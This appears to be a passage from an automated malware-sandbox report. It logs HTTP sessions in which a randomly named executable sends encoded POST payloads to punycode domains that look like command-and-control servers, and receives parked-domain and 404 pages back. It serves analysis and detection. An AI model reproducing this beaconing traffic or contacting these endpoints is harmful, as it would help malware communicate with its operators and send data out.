Aug 13, 2024 06:43:51.716262102 CEST	519	OUT	GET /rm91/?uXTT=8FDHY8dP&jN=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.xn--fhq1c541j0zr.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 13, 2024 06:43:52.513009071 CEST	367	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:51:19 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49725	194.9.94.85	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:43:57.637999058 CEST	794	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 2f 65 31 61 73 5a 6a 63 64 32 67 50 36 42 6b 6d 4c 77 6e 73 41 75 31 32 54 36 52 35 53 45 48 62 47 73 48 63 45 6f 3d Data Ascii: jN=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2X/e1asZjcd2gP6BkmLwnsAu12T6R5SEHbGsHcEo=
Aug 13, 2024 06:43:58.535918951 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Aug 2024 04:43:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 13, 2024 06:43:58.535944939 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 13, 2024 06:43:58.535959959 CEST	448	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 13, 2024 06:43:58.536014080 CEST	1236	IN	Data Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20 Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Aug 13, 2024 06:43:58.536031008 CEST	1236	IN	Data Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
Aug 13, 2024 06:43:58.536047935 CEST	430	IN	Data Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49726	194.9.94.85	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:00.184510946 CEST	814	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 43 4e 6d 41 79 6d 6f 69 6c 75 42 6c 38 33 43 54 39 49 54 7a 6b 49 31 39 71 4c 6a 75 45 6c 70 6d 47 39 66 78 79 45 Data Ascii: jN=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gCNmAymoiluBl83CT9ITzkI19qLjuElpmG9fxyE
Aug 13, 2024 06:44:00.865123034 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Aug 2024 04:44:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 13, 2024 06:44:00.865175962 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 13, 2024 06:44:00.865210056 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 13, 2024 06:44:00.865245104 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 13, 2024 06:44:00.865293026 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49727	194.9.94.85	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:02.726593018 CEST	1831	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 47 6c 57 35 49 52 6a 49 38 4f 71 67 47 4b 73 68 32 52 76 32 56 51 66 30 77 42 44 7a 68 38 64 7a 30 46 79 71 2b 6f 72 50 31 62 38 69 50 6d 65 6d 33 2f 67 39 35 74 5a 36 67 45 4f 59 45 77 42 41 64 6d 7a 78 42 78 67 42 2b 79 2f 55 51 6e 73 2f 63 77 4f 67 75 50 70 58 4a 32 45 52 42 78 61 71 6a 31 65 36 47 45 67 46 46 41 32 51 54 4d 33 35 4b 37 39 55 7a 76 74 4a 49 48 58 51 79 46 65 6d 65 52 6c 4e 46 67 6f 33 64 6e 31 55 6c 6a 30 43 32 6b 38 6f 4b 54 5a 32 4a 70 6e 75 67 58 6b 51 49 77 2b 55 63 [TRUNCATED] Data Ascii: jN=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNvGlW5IRjI8OqgGKsh2Rv2VQf0wBDzh8dz0Fyq+orP1b8iPmem3/g95tZ6gEOYEwBAdmzxBxgB+y/UQns/cwOguPpXJ2ERBxaqj1e6GEgFFA2QTM35K79UzvtJIHXQyFemeRlNFgo3dn1Ulj0C2k8oKTZ2JpnugXkQIw+UcWkSqggKaSzOp/KNFfQMsrNAJXV4YZrrxFePPINFPpP2ZR7X1SQ+8jwyUGRvrriVKdYzXldKKzrIDDAsmpI48hbOb0rzsNZBs/IXTWPn73fJlvVnoMLFnmJexhRdIa/pffmcmUKe1UFxM0t+OWt3o7SVflYstWcoAytbQdatTBXOFloOrODQiS0VpQdn2JiOGw+fU73BqSpEXfo4Kf3pq5XF84UZyOwtEYwNd99jHmZO2Dlsz7QQiNHwPKo/qCZfUaBreOOoVawAWhauUbAth1yPro29MpIePFqIT0sQLYjAjvFSKqy7BRPzoLzsEPoP8k9aItYgxyMTtalqe8p9YnXW3JcK90dX121TR7it8YZtWxe1n6qYpuOT+qyx5UC3QnQs8ETL/E+a90eFm9sZU8YSSXNdq0RYG4j+XdN9eMrTRFhGPOQ9HeikR9rPWF5fD/1jUcY4ojR5a8tfkKX1R0pup4F1MdyCumAjLftXHY2rDiGuf034OKnMQw/7V4sOUTaTNFYklAYrk5PHdPKbKAWhqD/JTP+/ZQYlqnzSFVyRGd5SY48pQxSEkcFPN4A5IMa7SCagFXWzQJ6uLspYUeXisXH1SgvMR0wR8axj2zucR2cFQcvBYclty2+4OXWc20eUvhFVR48YS/ndoJNwcF7zcU0LXr3qvLX [TRUNCATED]
Aug 13, 2024 06:44:03.376930952 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Aug 2024 04:44:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 13, 2024 06:44:03.377016068 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 13, 2024 06:44:03.377053022 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 13, 2024 06:44:03.377139091 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 13, 2024 06:44:03.377188921 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49728	194.9.94.85	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
